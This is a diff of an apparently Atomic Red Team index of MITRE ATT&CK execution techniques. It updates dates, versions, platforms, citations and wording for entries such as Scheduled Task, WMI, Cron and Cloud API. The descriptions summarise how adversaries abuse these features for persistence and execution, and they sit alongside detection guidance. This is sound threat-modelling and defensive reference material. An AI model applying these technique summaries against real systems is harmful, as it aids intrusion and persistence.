       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -50795,7 +51112,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -50827,8 +51144,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -50842,6 +51159,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -50854,11 +51175,14 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests:
     - name: Scheduled Task Startup Script
@@ -51237,7 +51561,7 @@ execution:
           schtasks /Delete /TN "#{task_name}" /F
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -51303,7 +51627,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests:
     - name: WMI Reconnaissance Users
@@ -51614,7 +51937,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests:
     - name: ESXi - Install a custom VIB on an ESXi host
@@ -51681,61 +52003,7 @@ execution:
         elevation_required: false
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -51748,26 +52016,78 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests:
     - name: JScript execution to gather local computer information via cscript
@@ -51823,7 +52143,7 @@ execution:
         name: command_prompt
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -51881,9 +52201,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests:
     - name: ListCronjobs
@@ -52044,7 +52363,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests:
     - name: Execute Commands
@@ -52117,15 +52435,15 @@ execution:
         name: manual
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -52153,7 +52471,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -52173,9 +52491,8 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests:
     - name: OSTap Style Macro Execution
@@ -52652,26 +52969,7 @@ execution:
         name: powershell
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -52688,6 +52986,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -52698,9 +52997,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -52708,8 +53011,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests:
     - name: Cron - Replace crontab with referenced file
@@ -52863,7 +53182,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -52888,12 +53207,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -52973,11 +53290,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -53037,7 +53353,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests:
     - name: AppleScript
@@ -53058,7 +53373,7 @@ execution:
         name: sh
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -53156,9 +53471,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -53175,7 +53490,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests:
     - name: Execution through API - CreateProcess
@@ -53256,14 +53570,14 @@ execution:
         cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -53272,7 +53586,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -53309,11 +53623,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -53350,11 +53663,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -53373,13 +53685,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -53458,7 +53769,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests:
     - name: Deploy Docker container
@@ -53497,7 +53807,7 @@ execution:
           \n"
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -53508,6 +53818,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -53518,16 +53829,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -53558,9 +53869,6 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests:
     - name: AutoIt Script Execution
@@ -53606,7 +53914,7 @@ execution:
         name: powershell
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -53672,9 +53980,8 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
